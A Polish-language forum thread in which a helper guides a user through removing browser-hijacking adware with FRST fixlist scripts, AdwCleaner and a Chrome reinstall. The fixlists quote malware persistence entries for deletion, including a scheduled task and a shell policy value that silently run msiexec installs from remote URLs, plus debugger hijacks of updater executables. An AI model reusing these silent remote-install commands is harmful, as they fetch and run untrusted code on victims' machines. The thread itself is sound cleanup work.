Initialsite123, Big Farm, Big Bang Empire, mystartDealWiFi, podmienione przeglądarki, AdwCleanera nie da się zainstalować

[Lambert]

Witam! Mam bardzo podobny problem co do reszty tutaj postów.

Używam Chrome'a i Firefoxa i obie zostały zamienione na te zainfekowane adware'em. Jako główną stronę mam "wyszukiwarkę" initialsite123, po wyszukiwaniu nią czegoś, ukazują się wyniki z wyszukiwarki DealWiFi, jeszcze dostałem ikonki Big'ów na pulpit.

 

Chciałem wszystko wyczyścić AdwCleanerem (antyvirusy nie dały rady) ale nie dało się zainstalować (Błąd systemu plików 65535), podobnie było z wieloma innymi programami tego typu.

 

Dołączam pliczki z FRST i GMER.

 

GMER.txt

Addition.txt

FRST.txt

Shortcut.txt

[picasso]

Adware wprowadziło blokadę programów zabezpieczających w oparciu o funkcję Niezaufanych certyfikatów, dlatego nie da się uruchomić m.in. AdwCleaner (blokada certyfikatu Malwarebytes). Poza tym są tu fałszywe przeglądarki "Chrome" i "Firefox" i masa innych śmieci. Działania do przeprowadzenia:

1. Przez Panel sterowania odinstaluj niepożądany program YAC(Yet Another Cleaner!).

2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść:

CloseProcesses:
CreateRestorePoint:
HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 637162CC59A3A1E25956FA5FA8F60D2E1C52EAC6 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 7D7F4414CCEF168ADF6BF40753B5BECD78375931 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (Avast Antivirus/Software) HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (Avast Antivirus/Software) HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Avast Antivirus/Software) HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Avast Antivirus/Software) HKLM\...\Policies\Explorer: [EnableShellExecuteHooks] 1
HKU\S-1-5-21-489643024-731826354-959299013-1000\...\Run: [GalaxyClient] => [X]
HKU\S-1-5-21-489643024-731826354-959299013-1000\...\Run: [background_fault] => C:\Users\Lambert\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-27] (AVAST Software) HKLM\...\Providers\1ol3sxub: C:\Program Files (x86)\Clihotain Configuration\local64spl.dll
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
ShellExecuteHooks: Brak nazwy - {6A69B0BA-392B-11E7-B267-64006A5CFC23} - C:\Users\Lambert\AppData\Roaming\Prageghtthasuy\Cohispphokisy.dll [145408 2017-05-20] ()
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku
WMI_ActiveScriptEventConsumer_ASEC: CHR HomePage: Default -> hxxp://www.luckysearch123.com?type=hp&ts=1495813616&from=ca9a0525&uid=wdcxwd1200js-00mhb0_wd-wcann104216642166&z=7e527a4ccae801a9a9a6823gbz6tcw5b4gdccoceag
CHR StartupUrls: Default -> "hxxp://www.luckysearch123.com?type=hp&ts=1495813616&from=ca9a0525&uid=wdcxwd1200js-00mhb0_wd-wcann104216642166&z=7e527a4ccae801a9a9a6823gbz6tcw5b4gdccoceag"
HKU\S-1-5-21-489643024-731826354-959299013-1000\...\ChromeHTML: -> C:\Program Files (x86)\Hippig\Application\chrome.exe (Google Inc.) HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1495817398&z=539fb33b098d581863e9993g4z3tcw5b0g1q1t5bbg&from=che0812&uid=WDCXWD1200JS-00MHB0_WD-WCANN104216642166&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1495817398&z=539fb33b098d581863e9993g4z3tcw5b0g1q1t5bbg&from=che0812&uid=WDCXWD1200JS-00MHB0_WD-WCANN104216642166&q={searchTerms}
HKU\S-1-5-21-489643024-731826354-959299013-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www-searching.com/?pid=s&s=H5Kzbcnbl1BU,6a532031-42f4-47fc-916e-b7d6d8da77f6,&vp=ch&prd=set_ie
SearchScopes: HKU\S-1-5-21-489643024-731826354-959299013-1000 -> {9A91F84A-3E08-4774-B825-7A6604704214} URL = hxxp://www-searching.com/s.ashx?prd=opensearch&q={searchTerms}&s=H5Kzbcnbl1BU,6a532031-42f4-47fc-916e-b7d6d8da77f6,
ShortcutWithArgument: C:\Users\Lambert\Desktop\Gówno\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www-searching.com/?prd=set_epf&s=h5kzbcnbl1bu,6a532031-42f4-47fc-916e-b7d6d8da77f6,
ShortcutWithArgument: C:\Users\Lambert\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1495817398&z=539fb33b098d581863e9993g4z3tcw5b0g1q1t5bbg&from=che0812&uid=WDCXWD1200JS-00MHB0_WD-WCANN104216642166
R2 BIT; C:\ProgramData\BIT\BIT.dll [1812992 2017-06-01] (TODO: ) [brak podpisu cyfrowego] S2 DsSvc; C:\ProgramData\Package Cache\{00C5024D-925C-4E9E-A8E6-F9B84ABE0DA0}\packages\Win81_SDK\9bcb3fab78e80d68be28892ea7ad46c3.msp [84 2017-05-25] () [brak podpisu cyfrowego]
R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [98456 2017-05-25] () S2 glory; C:\Users\Lambert\AppData\Local\glory\glory.dll [909824 2017-06-01] (glory) [brak podpisu cyfrowego] R2 WinSAPSvc; C:\Users\Lambert\AppData\Roaming\WinSAPSvc\WinSAP.dll [1886720 2017-06-01] () [brak podpisu cyfrowego] U3 aswbdisk; Brak ImagePath
U2 snare; Brak ImagePath
S4 sptd; \SystemRoot\System32\Drivers\sptd.sys [X]
U2 terana; Brak ImagePath
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
S3 xhunter1; \??\C:\Windows\xhunter1.sys [X]
Task: {032BAD74-97C2-43DE-B45B-88930DDF692F} - System32\Tasks\{D7AFBC4C-4474-49BE-80F6-F744826C4525} => C:\Program Files (x86)\Diablo II\Diablo II.exe
Task: {2F04D6BD-444A-40B0-9AAF-7E16B78A5008} - System32\Tasks\{C3660774-1430-4C6F-8E8D-021096A1846D} => C:\Users\Lambert\Desktop\adwcleaner_6.040.exe [2016-12-03] ()
Task: {494E40C4-7065-4724-A0CD-372B912DCB61} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-06-01] () Task: {55CA615F-492D-4305-B18F-FC520019D725} - System32\Tasks\{C5C828EA-3D5C-4845-B204-7FE4C2AE81FA} => pcalua.exe -a "C:\Users\Lambert\Desktop\SERIE A OFFICIAL HD KIT PACK V1 2016-17\ModdingWayInstaller.exe" -d "C:\Users\Lambert\Desktop\SERIE A OFFICIAL HD KIT PACK V1 2016-17"
Task: {93CDB1CB-5A6C-4B17-925E-CA176B66A3E4} - System32\Tasks\Overwolf Updater Task => C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe
Task: {CB1675FB-1CFE-4EA8-B420-931065D8D9E8} - System32\Tasks\Keyboard Checksum Verifier => Rundll32.exe "C:\Program Files\Keyboard Checksum Verifier\Keyboard Checksum Verifier.dll",xVbAXgKyh
Task: {CB4D2BD4-C91B-46A3-ACDC-B7BAFFF58620} - System32\Tasks\Arujogh Cloud => C:\Program Files (x86)\Walchshjit\yaupdcache.exe
Task: {DB4CEECD-3E4F-4CF8-90E1-AC0086D93F9C} - System32\Tasks\IBUpd2 => C:\Users\Lambert\AppData\Local\BrowserAir\48.0.0.0\updater.exe Task: {E5191DB7-0019-441E-A4BD-7057B820C5F5} - System32\Tasks\Clihotain Configuration => C:\Program Files (x86)\Walchshjit\ficult.exe
Task: {E81B7F83-F695-4905-BD35-AAD17C8649AE} - System32\Tasks\Microsoft\Windows\DeviceSettings\Thupetherbeqerph => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=WDCXWD1200JS-00MHB0_WD-WCANN104216642166&d=20170520 /q Task: {E976FE0B-314A-4A6F-AF68-E8A931C88CFB} - System32\Tasks\Trojan Remover => C:\Program Files\Loaris Trojan Remover\ltr.exe
Task: {FA76DE69-D3A4-481C-BF44-2C2DC557314C} - System32\Tasks\SMW_UpdateTask_Time_3835313734393736322d2355786c325a5b5734412d34 => Wscript.exe //B "C:\ProgramData\SearchModule\smhe.js" smu.exe /invoke /f:check_services /l:0 Task: {FE9FF048-6797-4E07-AA29-BBDCC273E036} - System32\Tasks\{F688C87D-DD38-4E0F-9D49-BFF7ECC53E4D} => pcalua.exe -a "C:\Users\Lambert\Desktop\SERIE A OFFICIAL HD KIT PACK V1 2016-17\ModdingWayInstaller.exe" -d "C:\Users\Lambert\Desktop\SERIE A OFFICIAL HD KIT PACK V1 2016-17"
DeleteKey: HKCU\Software\Google\Chrome\Extensions
DeleteKey: HKCU\Software\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla\Firefox\Extensions
DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins
CMD: netsh advfirewall reset
C:\$AV_ASW
C:\Cosusp
C:\Pipisy
C:\Program Files\1ol3sxub
C:\Program Files\AVAST Software
C:\Program Files\Keyboard Checksum Verifier
C:\Program Files\MK
C:\Program Files\Common Files\509E0
C:\Program Files\Common Files\Noobzo
C:\Program Files (x86)\Clihotain Configuration
C:\Program Files (x86)\Firefox
C:\Program Files (x86)\Hippig
C:\Program Files (x86)\MIO
C:\Program Files (x86)\Walchshjit
C:\ProgramData\log.binb
C:\ProgramData\log.ewbb
C:\ProgramData\log.ewbt
C:\ProgramData\.mono
C:\ProgramData\AVAST Software
C:\ProgramData\BIT
C:\ProgramData\Loaris
C:\ProgramData\SearchModule
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Max Payne-ROKA1969.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Diablo II
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Kolekcja Klasyki
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\San Andreas Multiplayer
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TP-LINK
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\YeaDesktop
C:\ProgramData\Package Cache\{00C5024D-925C-4E9E-A8E6-F9B84ABE0DA0}
C:\Stuvatybugtain
C:\Users\Lambert\AppData\Local\{CDB39C7B-51CB-4A3E-BDF9-8D90DE43D449}
C:\Users\Lambert\AppData\Local\AdvinstAnalytics
C:\Users\Lambert\AppData\Local\background_fault
C:\Users\Lambert\AppData\Local\BrowserAir
C:\Users\Lambert\AppData\Local\Firefox
C:\Users\Lambert\AppData\Local\glory
C:\Users\Lambert\AppData\Local\Hippig
C:\Users\Lambert\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk
C:\Users\Lambert\AppData\Local\Phoceshgrherry
C:\Users\Lambert\AppData\Local\snare
C:\Users\Lambert\AppData\Local\terana
C:\Users\Lambert\AppData\Local\THQ
C:\Users\Lambert\AppData\Roaming\AVAST Software
C:\Users\Lambert\AppData\Roaming\DAEMON Tools Lite
C:\Users\Lambert\AppData\Roaming\Event Monitor
C:\Users\Lambert\AppData\Roaming\Firefox
C:\Users\Lambert\AppData\Roaming\Google
C:\Users\Lambert\AppData\Roaming\Microleaves
C:\Users\Lambert\AppData\Roaming\Mozilla\Firefox\naweriweentcofise
C:\Users\Lambert\AppData\Roaming\Prageghtthasuy
C:\Users\Lambert\AppData\Roaming\Showuk
C:\Users\Lambert\AppData\Roaming\UCChannel
C:\Users\Lambert\AppData\Roaming\WinSAPSvc
C:\Users\Lambert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome (2).lnk
C:\Users\Lambert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk
C:\Users\Lambert\Desktop\AdwCleaner Portable AdwCleaner 5.019 PL
C:\Users\Lambert\Desktop\Gówno\Battlefield 1942.lnk
C:\Users\Lambert\Desktop\Gówno\Counter-Strike Source.lnk
C:\Users\Lambert\Desktop\Gówno\DAEMON Tools Lite.lnk
C:\Users\Lambert\Desktop\Gówno\Diablo III.lnk
C:\Users\Lambert\Desktop\Gówno\Grand Theft Auto Vice City.lnk
C:\Users\Lambert\Desktop\Gówno\GTA Vice City.lnk
C:\Users\Lambert\Desktop\Gówno\MassEffectConfig.lnk
C:\Users\Lambert\Desktop\Gówno\Quick Server.lnk
C:\Users\Lambert\Desktop\Gówno\San Andreas Multiplayer.lnk
C:\Users\Lambert\Desktop\Gówno\Skype.lnk
C:\Users\Lambert\Desktop\Gówno\Spartan.lnk
C:\Users\Lambert\Downloads\AdwCleaner*.exe
C:\Users\Lambert\Downloads\Emsisoft*.exe
C:\Users\Lambert\Downloads\Loaris*.exe
C:\Users\Lambert\Downloads\Malwarebytes*.exe
C:\Users\Lambert\Downloads\ReimageRepair.exe
C:\Users\Public\Desktop\Google Chrome.lnk
C:\Users\Public\Desktop\Mozilla Firefox.lnk
C:\Users\Public\Documents\report.dat
C:\Users\Public\Documents\temp.dat
C:\Windows\Reimage.ini
C:\Windows\csrss.exe
C:\Windows\taskmgr.exe
C:\Windows\Azart
C:\Windows\system32\Drivers\*.tmp
C:\Windows\system32\log
Hosts:
EmptyTemp:

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

3. Zostały usunięte skróty do fałszywych przeglądarek, więc zrób ręcznie skróty do prawdziwych. Ustaw wybraną przeglądarkę jako domyślna. Następnie po kolei wyczyść przeglądarki z adware:

Firefox:

Wyeksportuj zakładki, o ile jest co eksportować. Zamknij Firefox i wywołaj menedżer profilów poprzez klawisz z flagą Windows + R i wklejenie poniższej komendy w polu Uruchom i OK. W menedżerze usuń wszystkie widoczne profile i załóż nowy, zaloguj się na niego.

"C:\Program files (x86)\Mozilla Firefox\firefox.exe" -p

Google Chrome:

• Zresetuj synchronizację (o ile włączona): KLIK.
• Ustawienia > karta Rozszerzenia > odinstaluj Unlimited Free VPN - Hola. To niepożądane rozszerzenie, powiązane z aktywnością para-botnet
• Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone.
• Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy niedomyślne śmieci (o ile będą).

4. Zrób nowy log FRST z opcji Skanuj (Scan), bez Shortcut. Dołącz też plik fixlog.txt.

[Lambert]

Wszystko wykonane, Firefox wydaje się czysty jak łza, w Chromie pozostało coś: w Ustawienia > karta Ustawienia > sekcja Szukaj >Zarządzanie wyszukiwarkami > pozostało tutaj "mystarting123" ustawione jako domyślna wyszukiwarka. 

Gdy chciałem ustawić jako domyślną Google lub każdą inną, to po ok pół sekundy ponownie jako domyślna ustawiała się mystarting123, w efekcie nie da się jej usunąć, nawet gdy zdążyłem kliknąć button usunięcia przed samoistnym ustawieniem się jako domyślna wyszukiwarka. Ciekawe jest to, że gdy uruchamiam normalnie Chrome'a to ukazuje mi się zwykła domowa wyszukiwarka od Google taka jak jest domyślnie w świeżym Chrome.

Uruchomiłem instalator AdwCleanera by sprawdzić czy działa i tak, instalator działa. Nie instalowałem i nie czyściłem sam tym, bo nikt mi tu nie kazał.

Pliczki lecą. Dam też Addition na wszelki wypadek.

Addition.txt

Fixlog.txt

FRST.txt

[picasso]

Gdy chciałem ustawić jako domyślną Google lub każdą inną, to po ok pół sekundy ponownie jako domyślna ustawiała się mystarting123, w efekcie nie da się jej usunąć, nawet gdy zdążyłem kliknąć button usunięcia przed samoistnym ustawieniem się jako domyślna wyszukiwarka. Ciekawe jest to, że gdy uruchamiam normalnie Chrome'a to ukazuje mi się zwykła domowa wyszukiwarka od Google taka jak jest domyślnie w świeżym Chrome.

Czy to zachowanie nadal ma miejsce po użyciu skryptu FRST?

 

Większość zadań wykonana, ale pojawiły się nowe wpisy. Poprawki:

 

1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść:

 

HKU\S-1-5-21-489643024-731826354-959299013-1000\...\Policies\system: [shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj1YMTNWMUUdRTLXMjZQRUFcNjNLMWVSFjHyMUVLRTFdFc== /q
S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] 
ShortcutWithArgument: C:\Users\Lambert\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.yeadesktop.com/
ShortcutWithArgument: C:\Users\Lambert\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.yeadesktop.com/
ShortcutWithArgument: C:\Users\Lambert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.yeadesktop.com/
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla\Thunderbird
RemoveDirectory: C:\AdwCleaner
RemoveDirectory: C:\FRST\Quarantine
RemoveDirectory: C:\Users\Lambert\Downloads\FRST-OlderVersion
StartBatch:
del /q C:\Users\Lambert\Desktop\adwcleaner*.*
del /q C:\Users\Lambert\Downloads\adwcleaner*.*
del /q C:\Users\Lambert\Downloads\qd1y4yyr.exe
del /q C:\Users\Lambert\Downloads\SPTDinst-v189-x64.exe
del /q C:\Windows\system32\Drivers\iSafeKrnlBoot.sys
del /q C:\Windows\system32\Drivers\iSafeNetFilter.sys
EndBatch:

 

Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Przedstaw wynikowy fixlog.txt.

 

2. Spróbuj ponowić usuwanie wyszukiwarki mystarting123.com z Google Chrome.

 

3. Pobierz z przyklejonego najnowszą wersję AdwCleaner. Następnie uruchom w nim czyszczenie i dostarcz log wynikowy z folderu C:\AdwCleaner.

[Lambert]

Zastosowałem FRST, w fixlogu wszystko było dobrze, pomyślnie usunięte. Mimo to dalej mystarting nie chce dać się usunąć. Pod wpływem chwili zrobiłem drugi raz naprawianie FRST, przez co plik fixloga jest zaciemniony (objaśnię później), ale dalej to samo, nie da się usunąć.

AdwCleaner zrobił wielką robotę i wyczyścił wszystko oprócz mystartinga (którego wcześniej wyszukał i zaznaczył do usunięcia). Reset komputera, włączam Chrome'a i dalej mystartinga nie idzie skasować. Przeskanowałem 2 raz AdwCleanerem i znalazło 1 zagrożenie - właśnie mystartinga. No to czyszcze i reset. (dlatego są dwa raporty z AdwCleanera, C0 jest pierwszym, C1 drugim).

Pale Chrome'a i dalej to samo, mystarting siedzi jak gleń. W tej chwili przeszukałem kompa AdwCleanerem po raz trzeci, i to samo: znalazło tylko mystartinga. Chyba nie było sensu czyszczenie kolejny raz, wiadomo jak by wyszło.

 

Co do fixloga: po drugim fixowaniu FRST, nowy fixlog podmienił tego starszego, przez co taka sytuacja.

Objaśnie co było na pierwotnym fixlogu:

- w środkowej części tekstu, przy każdym kluczu czy adresie pliku pisało: "(wartość/argument/-) pomyślnie usunięto"

- na dole pomiędzy ========= Batch: =========, a ========= Koniec  Batch: =========, nie było nic. Zapewnie pliki zostały poprawnie usunięte, skoro na drugim, wysłanym tutaj fixlogu jest napisane, że "nie można odnaleźć". Nie zmieniałem lokalizacji żadnego z tych plików pomiędzy naprawami.

Fixlog.txt

AdwCleanerC0.txt

AdwCleanerC1.txt

[picasso]

Mimo to dalej mystarting nie chce dać się usunąć.

W innym temacie wykryłam, że modyfikacja siedzi w globalnym pliku resources.pak. Konieczna reinstalacja Google Chrome. Przy deinstalacji zaznacz opcję Usuń także dane przeglądarki, by pozbyć się też zdefektowanego profilu.